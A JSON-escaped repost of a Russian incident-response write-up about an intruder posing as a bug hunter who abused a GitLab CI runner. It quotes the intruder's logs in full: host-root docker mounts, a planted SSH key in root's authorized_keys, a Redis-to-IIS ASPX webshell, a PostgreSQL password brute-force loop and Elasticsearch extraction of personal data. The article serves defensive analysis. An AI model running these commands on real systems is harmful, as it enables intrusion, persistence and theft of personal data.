\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043a\u0438\u0431\u0435\u0440\u0443\u0433\u0440\u043e\u0437 \u00ab\u0418\u043d\u0444\u043e\u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0414\u0436\u0435\u0442\u00bb<\/em><\/p>\n<\/div>\n<p>\u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/articles\/1050526\/\">https:\/\/habr.com\/ru\/articles\/1050526\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u0412\u0441\u0435\u043c \u043f\u0440\u0438\u0432\u0435\u0442 \u043e\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b DFIR JetCSIRT! \u0425\u043e\u0442\u0438\u043c \u043f\u043e\u0434\u0435\u043b\u0438\u0442\u044c\u0441\u044f \u0441 \u0432\u0430\u043c\u0438 \u043e\u0434\u043d\u0438\u043c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u043c \u043a\u0435\u0439\u0441\u043e\u043c, \u044d\u043c\u043e\u0446\u0438\u0438 \u043e\u0442 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043f\u0440\u0435\u043a\u0440\u0430\u0441\u043d\u043e \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u044d\u0442\u0430 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0430:\u041d\u043e \u043e\u0431\u043e \u0432\u0441\u0435\u043c \u043f\u043e \u043f\u043e\u0440\u044f\u0434\u043a\u0443\u2026\u0418\u0442\u0430\u043a. \u0417\u0430\u043a\u0430\u0437\u0447\u0438\u043a \u0437\u0430\u0432\u043e\u0434\u0438\u0442 \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0433\u043e\u0432\u043e\u0440\u0438\u0442, \u0447\u0442\u043e \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u043f\u0443\u0448\u0438\u0442 \u043d\u0435\u043f\u043e\u043d\u044f\u0442\u043d\u044b\u0435 \u043a\u043e\u043c\u043c\u0438\u0442\u044b \u0432 GitLab. \u041f\u043e \u043f\u043e\u0447\u0442\u0435 \u043e\u043d\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u043b\u0438, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u0441\u0435\u0431\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e access-\u0442\u043e\u043a\u0435\u043d\u043e\u0432, \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u043e\u0432\u044b\u0445 \u0432\u0445\u043e\u0434\u043e\u0432 \u0432 \u0432\u0435\u0431 GitLab \u0432 \u044d\u0442\u043e\u0442 \u043f\u0435\u0440\u0438\u043e\u0434 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u043d\u0435 \u0431\u044b\u043b\u043e. \u00a0\u041f\u043e\u0434\u043e\u0437\u0440\u0435\u0432\u0430\u044e\u0442, \u0447\u0442\u043e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d \u043b\u0438\u0447\u043d\u044b\u0439 \u043a\u043e\u043c\u043f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0441 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043e\u043d \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 GitLab. \u0412\u0430\u0436\u043d\u043e\u0435 \u0434\u043e\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435: \u0432 \u043a\u043e\u043c\u043c\u0438\u0442\u0430\u0445 \u043e\u043d\u0438 \u0432\u0438\u0434\u044f\u0442 \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043e\u043a X-BugBounty, \u043d\u043e, \u0441\u043e \u0441\u043b\u043e\u0432 \u0417\u0430\u043a\u0430\u0437\u0447\u0438\u043a\u0430, \u043e\u043d\u0438 \u043d\u0435 \u0443\u0447\u0430\u0441\u0442\u0432\u0443\u044e\u0442 \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435 \u0431\u0430\u0433\u0431\u0430\u0443\u043d\u0442\u0438, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0443\u0432\u0435\u0440\u0435\u043d\u044b, \u0447\u0442\u043e \u0442\u0430\u043a \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a. \u0417\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0443\u0447\u0435\u0442\u043a\u0443 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u0438 \u043d\u0430\u0447\u0430\u043b\u0438 \u0441\u043e\u0431\u0438\u0440\u0430\u0442\u044c \u0442\u0440\u0438\u0430\u0436 \u0441 \u0435\u0433\u043e \u0410\u0420\u041c \u043d\u0430 \u0430\u043d\u0430\u043b\u0438\u0437.\u041f\u043e\u043a\u0430 \u0441\u043e\u0431\u0438\u0440\u0430\u043b\u0438\u0441\u044c \u0434\u0430\u043d\u043d\u044b\u0435, \u043c\u044b \u0443\u0441\u043f\u0435\u043b\u0438 \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c, \u0447\u0442\u043e \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b \u043d\u0430\u0448 \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433:\u0441\u043a\u0430\u043d \u0441 \u0443\u0437\u043b\u0430 runner;ssh-\u0431\u0440\u0443\u0442 \u0441 \u0443\u0437\u043b\u0430 runner;\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0441 \u0443\u0437\u043b\u0430 runner;impacket \u0441 \u0443\u0437\u043b\u0430 runner\u2026\u0421\u0442\u043e\u0438\u0442 \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e GitLab \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432\u043d\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0417\u0430\u043a\u0430\u0437\u0447\u0438\u043a\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443, \u043f\u043e\u0445\u043e\u0436\u0435, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043f\u0435\u0439\u043b\u043e\u0430\u0434\u044b \u0447\u0435\u0440\u0435\u0437 runner, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d \u0443\u0436\u0435 \u0432\u043d\u0443\u0442\u0440\u0438, \u0442\u0435\u043c \u0441\u0430\u043c\u044b\u043c \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c\u0441\u044f \u0438 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c\u0441\u044f. \u041c\u044b \u0431\u044c\u0435\u043c \u0442\u0440\u0435\u0432\u043e\u0433\u0443, \u0438\u0437\u043e\u043b\u0438\u0440\u0443\u0435\u043c \u0443\u0437\u0435\u043b runner \u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u043d\u0430 \u0430\u043d\u0430\u043b\u0438\u0437 \u0432\u0441\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 GitLab \u0438 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.\u0427\u0442\u043e \u0436\u0435 \u0434\u0435\u043b\u0430\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a?\u0412 \u0434\u0435\u043d\u044c \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430 \u0432 00:11 \u043e\u043d \u043f\u0435\u0440\u0435\u0431\u0438\u0440\u0430\u0435\u0442 \u043f\u0440\u043e\u0435\u043a\u0442\u044b \u0447\u0435\u0440\u0435\u0437 gitlab-shell, \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c \u0441 ssh-\u043a\u043b\u044e\u0447\u043e\u043c \u043f\u043e\u0434 \u0423\u0417 \u0442\u043e\u0433\u043e \u0441\u0430\u043c\u043e\u0433\u043e \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430. \u041e\u0442\u043a\u0443\u0434\u0430 \u0432\u0437\u044f\u043b\u0441\u044f ssh-\u043a\u043b\u044e\u0447, \u0441\u043f\u0440\u043e\u0441\u0438\u0442\u0435 \u0432\u044b? \u041f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u0435\u043c \u043f\u043e\u043a\u0430 \u043e\u0442\u043b\u043e\u0436\u0438\u0442\u044c \u044d\u0442\u043e\u0442 \u0432\u043e\u043f\u0440\u043e\u0441 \u0438 \u0432\u0435\u0440\u043d\u0443\u0442\u044c\u0441\u044f \u043a \u043d\u0435\u043c\u0443 \u0447\u0443\u0442\u044c \u043f\u043e\u0437\u0436\u0435.\u0412 00:24 \u043e\u043d \u0443\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0441\u0435\u0431\u0435 \u0442\u043e\u043a\u0435\u043d, \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0441\u0430\u043c\u043e\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0435. \u0412 \u043b\u043e\u0433\u0430\u0445 jobs \u0432\u0438\u0434\u0438\u043c \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0441\u0442\u0438\u043b\u044c:\u0414\u0438\u0441\u043a\u043b\u0435\u0439\u043c\u0435\u0440\u0417\u0434\u0435\u0441\u044c \u0438 \u0434\u0430\u043b\u0435\u0435 \u043c\u044b \u0441\u043a\u0440\u044b\u0432\u0430\u0435\u043c \u043b\u044e\u0431\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u0443\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u0438\u043b\u0438 \u0417\u0430\u043a\u0430\u0437\u0447\u0438\u043a\u0430:IP-\u0430\u0434\u0440\u0435\u0441 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u2013 100.100.100.100\u0414\u043e\u043c\u0435\u043d \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u2013 domain.su\u041d\u0438\u043a\u043d\u0435\u0439\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u2013 Bughunter\u0423\u0417 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u0417\u0430\u043a\u0430\u0437\u0447\u0438\u043a\u0430 \u2013 \u0412\u0430\u0441\u044f \u041f\u0443\u043f\u043a\u0438\u043d (pupkin)===== JOB 3150646 TRACE START =====project=[masked]\/etz\/etz.front name=security-test status=success ref=security-test-Bughunter pipeline=805678 runner=743Running with gitlab-runner 17.10.0 (67b2b2db)Pulling docker image docker:20.10-dind &#8230;Executing &#171;step_script&#187; stage of the job script$ echo &#171;X-BugBounty Bughunter &#8212; Security Test&#187;X-BugBounty Bughunter &#8212; Security Test$ whoamiroot$ iduid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)\u0422\u043e \u0435\u0441\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0432\u043d\u043e\u0441\u0438\u0442 \u043a\u043e\u043c\u043c\u0438\u0442\u044b \u0432 .gitlab-ci.yml, \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u043f\u0430\u0439\u043f\u043b\u0430\u0439\u043d, \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0441\u043e\u0437\u0434\u0430\u0435\u0442\u0441\u044f job security-test, runner \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440 \u0438 \u0432 \u043d\u0435\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0438\u0437 script.\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043f\u043e \u0431\u0430\u0437\u0435 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f. \u0427\u0442\u043e \u0441\u0430\u043c\u043e\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0435, \u043f\u0435\u0440\u0435\u0434 \u043a\u0430\u0436\u0434\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439 \u043e\u043d \u0432\u044b\u0432\u043e\u0434\u0438\u0442 \u043f\u043e\u044f\u0441\u043d\u0435\u043d\u0438\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e echo.$ echo &#171;X-BugBounty Bughunter &#8212; escalation recon&#187;$ echo &#171;=== HOST FILESYSTEM ===&#187;$ docker run &#8212;rm -v \/:\/host alpine sh -c &#171;cat \/host\/etc\/hostname 2&gt;\/dev\/null; echo &#8212;; cat \/host\/etc\/hosts 2&gt;\/dev\/null | head -30; echo &#8212;; ls -la \/host\/home\/ 2&gt;\/dev\/null; echo &#8212;; ls -la \/host\/root\/.ssh\/ 2&gt;\/dev\/null; cat \/host\/root\/.ssh\/known_hosts 2&gt;\/dev\/null | head -20&#8243;[0;m$ echo &#171;=== GITLAB RUNNER CONFIG ===&#187;$ docker run &#8212;rm -v \/:\/host alpine sh -c &#171;find \/host -maxdepth 5 -name config.toml -path &#8216;*gitlab*&#8217; 2&gt;\/dev\/null -exec head -80 {} \\;&#187;[0;mconcurrent = 10$ echo &#171;=== HOST NETWORK INTERFACES ===&#187;$ docker run &#8212;rm &#8212;net=host alpine ip addr show$ echo &#171;=== USER SSH KEYS ===&#187;$ docker run &#8212;rm -v \/:\/host alpine sh -c &#171;for d in \/host\/home\/*\/; do u=\\$(basename \\$d); echo &#8212; \\$u &#8212;; ls -la \\$d\/.ssh\/ 2&gt;\/dev\/null; cat \\$d\/.ssh\/id_rsa.pub 2&gt;\/dev\/null; cat \\$d\/.ssh\/authorized_keys 2&gt;\/dev\/null | head -5; done&#187;\u0412\u0430\u043c \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043d\u0430\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442 \u00ab===\u00bb? \u0414\u0430-\u0434\u0430, \u0442\u0430\u043a \u043e\u0431\u044b\u0447\u043d\u043e \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u044b ChatGPT \u0438 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0435 \u0418\u0418-\u0441\u0435\u0440\u0432\u0438\u0441\u044b.\u0417\u0434\u0435\u0441\u044c \u043e\u043d \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0430 \u0443\u0437\u043b\u0435 runner \u0441\u043e \u0441\u0432\u043e\u0438\u043c ssh-\u043a\u043b\u044e\u0447\u043e\u043c:$ echo &#171;=== STEP 1 &#8212; SSH KEY ON RUNNER HOST ===&#187;$ docker run &#8212;rm -v \/:\/host alpine sh -c &#171;echo &#8216;ssh-ed25519 [masked] bb-bughunter-test&#8217; &gt;&gt; \/host\/root\/.ssh\/authorized_keys; cat \/host\/root\/.ssh\/authorized_keys&#187;\u041f\u043e\u0441\u043b\u0435 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u043e\u043d \u0441\u043a\u0430\u043d\u0438\u0442 \u043f\u043e\u0434\u0441\u0435\u0442\u044c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e nmap. \u041f\u043e\u0442\u043e\u043c \u043f\u043e \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u043c \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u043f\u043e\u0440\u0442\u0430\u043c \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442 \u043e\u0431\u0440\u0430\u0449\u0430\u0442\u044c\u0441\u044f \u043a \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u043c \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u043c. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u043a Redis-\u0441\u0435\u0440\u0432\u0435\u0440\u0443 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0441\u043f\u0438\u0441\u043e\u043a \u043a\u043b\u044e\u0447\u0435\u0439 \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0437\u0430\u043f\u0438\u0441\u0435\u0439:$ docker run &#8212;rm &#8212;net=host alpine sh -c &#8216; # collapsed multi-line command=== REDIS [masked] (NO AUTH) ===# Server[masked]# Keyspace[masked]$ echo &#171;X-BugBounty Bughunter &#8212; Redis data extraction&#187;$ docker run &#8212;rm &#8212;net=host alpine sh -c &#8216; # collapsed multi-line command=== REDIS db0 HGETALL sample ===[masked]=== REDIS db0 SECOND KEY ===[masked]=== REDIS db7 HGETALL sample ===[masked]\u0414\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442, \u0447\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0433:$ docker run &#8212;rm &#8212;net=host alpine sh -c &#8216; # collapsed multi-line command=== REDIS CONFIG SET PROOF ===&#8212; Current dir &#8212;dirC:\\Program Files\\Redis&#8212; Set dir to IIS webroot &#8212;OK&#8212; Verify &#8212;dirC:\\inetpub\\wwwroot&#8212; Set dbfilename &#8212;OK&#8212; Verify &#8212;dbfilenametest-bughunter.txt&#8212; Restore original &#8212;OK\u0417\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u043f\u0443\u043d\u043a\u0442 \u00abRestore original\u00bb? \u0414\u0443\u043c\u0430\u044e, \u0447\u0442\u043e \u0441 \u044d\u0442\u043e\u0433\u043e \u043c\u043e\u043c\u0435\u043d\u0442\u0430 \u043c\u044b \u0432\u0441\u0435-\u0442\u0430\u043a\u0438 \u043f\u0435\u0440\u0435\u0441\u0442\u0430\u043d\u0435\u043c \u043d\u0430\u0437\u044b\u0432\u0430\u0442\u044c \u0435\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c. \u041f\u043e\u0432\u0441\u044e\u0434\u0443 \u0440\u0430\u0441\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0442\u0435\u0433\u0438 X-BugBounty, \u043a\u043e\u043c\u043c\u0438\u0442\u044b \u043e\u0442 ChatGPT, \u043f\u0430\u0442\u0442\u0435\u0440\u043d\u044b \u00ab\u043d\u0435\u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0439\u00bb \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043f\u043e \u043a\u0430\u043d\u043e\u043d\u0430\u043c \u0431\u0430\u0433\u0431\u0430\u0443\u043d\u0442\u0438, \u043e\u0442\u043a\u0430\u0442 \u043a \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044e\u2026 \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0434\u0430\u043b\u044c\u0448\u0435 \u0431\u0443\u0434\u0435\u043c \u043d\u0430\u0437\u0432\u0430\u0442\u044c \u0435\u0433\u043e \u0431\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440\u043e\u043c-\u043d\u0435\u043b\u0435\u0433\u0430\u043b\u043e\u043c.\u0422\u0443\u0442 \u043e\u043d \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e RCE\u043d\u0430 \u0432\u0441\u0435 \u0442\u043e\u043c \u0436\u0435 Redis:$ echo &#171;=== STEP 2 &#8212; Write ASPX webshell payload ===&#187;$ redis-cli -h 10.50.101.17 SET bughunter-rce &#171;\\r\\n&lt;%@ Page Language=\\&#187;C#\\&#187; %&gt;&lt;%Response.Write(\\&#187;BUGHUNTER-BB-POC|\\&#187;+System.Environment.MachineName+\\&#187;|\\&#187;+System.Environment.UserName+\\&#187;|\\&#187;+System.Environment.UserDomainName+\\&#187;|\\&#187;+System.Environment.OSVersion.ToString());%&gt;\\r\\n&#187;$ redis-cli -h 10.50.101.17 BGSAVEBackground saving started$ echo &#171;=== STEP 3 &#8212; Trigger webshell ===&#187;$ curl -sv -m 10 &#171;http:\/\/10.50.101.17\/bughunter-bb.aspx&#187; 2&gt;&amp;1 || true*\u00a0\u00a0 Trying 10.50.101.17:80&#8230;* Connected to 10.50.101.17 (10.50.101.17) port 80* using HTTP\/1.x&gt; GET \/bughunter-bb.aspx HTTP\/1.1&gt; Host: 10.50.101.17&gt; User-Agent: curl\/8.12.1&gt; Accept: \/$ echo &#171;=== STEP 4 &#8212; Cleanup ===&#187;$ redis-cli -h 10.50.101.17 DEL bughunter-rce\u041f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0441\u0431\u0440\u0443\u0442\u0438\u0442\u044c \u0443\u0447\u0435\u0442\u043a\u0438 PostgreSQL \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u043c\u0438 \u043f\u0430\u0440\u043e\u043b\u044f\u043c\u0438:$ echo &#171;=== PG brute with found passwords ===&#187;$ export HOSTS=&#187;&#8230;&#187;$ export USERS=&#187;&#8230;&#187;$ export PASSWORDS=&#187;qwerty ciqwerty qwerty123! custom_pass test postgres password P@ssw0rd&#187;$ for h in $HOSTS; do for u in $USERS; do for p in $PASSWORDS; do RESULT=$(PGPASSWORD=$p psql -h $h -U $u -p 5432 -c &#171;SELECT current_database(),current_user,version();&#187; 2&gt;&amp;1 | head -3); if echo &#171;$RESULT&#187; | grep -q &#171;row&#187;; then echo &#171;SUCCESS $h $u\/$p&#187;; echo &#171;$RESULT&#187;; fi; done; done; done\u0422\u0430\u043a\u0436\u0435 \u0431\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u043a Elasticsearch \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438:=== Try Elasticsearch without auth ===$ curl -sk -m 5 http:\/\/10.50.101.3:9200\/ || true$ curl -sk -m 5 http:\/\/10.50.101.2:9200\/ || true$ curl -sk -m 5 http:\/\/10.50.101.4:9200\/ || true\u0421\u043e\u0437\u0434\u0430\u0435\u0442 \u0438\u043d\u0434\u0435\u043a\u0441 Elasticsearch \u0438 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u0442\u0443\u0434\u0430 \u0434\u0430\u043d\u043d\u044b\u0435 \u0434\u043b\u044f \u0442\u0435\u0441\u0442\u0430. \u0412\u0441\u0435 \u044d\u0442\u0438 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u043e\u043d \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0447\u0435\u0440\u0435\u0437 python-\u0441\u043a\u0440\u0438\u043f\u0442\u044b, \u0437\u0430\u0432\u0435\u0440\u043d\u0443\u0442\u044b\u0435 \u0432 Base64:$ docker run &#8212;rm &#8212;net=host python:3.11-alpine sh -c &#171;echo aW1wb3J0IHVybGxpYi5yZXF1ZXN0LCBqc29uLCBzc2wKY3R4ID0gc3NsLmNyZWF0ZV9kZWZhdWx0X2NvbnRleH[masked]=== CREATE TEST INDEX ===CREATE: {&#171;acknowledged&#187;:true,&#187;shards_acknowledged&#187;:true,&#187;index&#187;:&#187;bb-bughunter-test-index&#187;}=== WRITE TEST DOC ===WRITE: {&#171;_index&#187;:&#187;bb-bughunter-test-index&#187;,&#187;_id&#187;:&#187;1&#8243;,&#187;_version&#187;:1,&#187;result&#187;:&#187;created&#187;,&#187;_shards&#187;:{&#171;total&#187;:1,&#187;successful&#187;:1,&#187;failed&#187;:0},&#187;_seq_no&#187;:0,&#187;_primary_term&#187;:1}=== READ BACK ===READ: {&#171;_index&#187;:&#187;bb-bughunter-test-index&#187;,&#187;_id&#187;:&#187;1&#8243;,&#187;_version&#187;:1,&#187;_seq_no&#187;:0,&#187;_primary_term&#187;:1,&#187;found&#187;:true,&#187;_source&#187;:{&#171;message&#187;: &#171;X-BugBounty: Bughunter &#8212; proof of write access&#187;, &#171;timestamp&#187;: &#171;2026-05-21&#187;}}=== DELETE TEST INDEX ===DELETE: {&#171;acknowledged&#187;:true}\u0415\u0449\u0435 \u043e\u043d \u043f\u0440\u043e\u0431\u0443\u0435\u0442 \u0432\u044b\u0442\u0430\u0449\u0438\u0442\u044c \u043f\u0435\u0440\u0441\u043e\u043d\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 (email, \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u044b, \u043f\u0430\u0441\u043f\u043e\u0440\u0442\u0430, \u0430\u0434\u0440\u0435\u0441\u0430, \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u044b \u0438 \u043f\u0440\u043e\u0447\u0435\u0435) \u0438\u0437 \u0438\u043d\u0434\u0435\u043a\u0441\u043e\u0432 Elasticsearch:=== PASSPORT\/SNILS\/ADDRESS: 10000 hits ===\u00a0 [cmw_test-prod_system_event_adapter]\u00a0 {&#171;id&#187;: &#171;08de8a99-6bce-2e9a-9255-000000011303&#187;, &#171;previous_event&#187;: &#171;08de8a99-6bce-2e9a-9255-000000011302&#187;, &#171;origin_event&#187;: &#171;08de8a99-6bce-2e9a-0000-000000000000&#187;, &#171;initiator&#187;: {&#171;abbreviation&#187;: &#171;[masked]&#187;, &#171;type&#187;: &#171;Account&#187;, &#171;id&#187;: &#171;account.3690&#187;, &#171;name&#187;: &#171;[masked]&#187;, &#171;alias&#187;: &#171;[masked]&#187;}, &#171;type&#187;: &#171;AdapterRequestSent&#187;, &#171;status&#187;: &#171;Success&#187;, &#171;solution&#187;: {&#171;type&#187;: &#171;Solution&#187;, &#171;id&#187;: &#171;system&#187;, &#171;name&#187;: &#171;system&#187;}, &#171;container&#187;: {&#171;type&#187;: &#171;Adapter&#187;, &#171;id&#187;: &#171;adapter&#187;, &#171;name&#187;: &#171;adapter&#187;}, &#171;adapter_data&#187;: {&#171;plugin&#187;: {&#171;type&#187;: 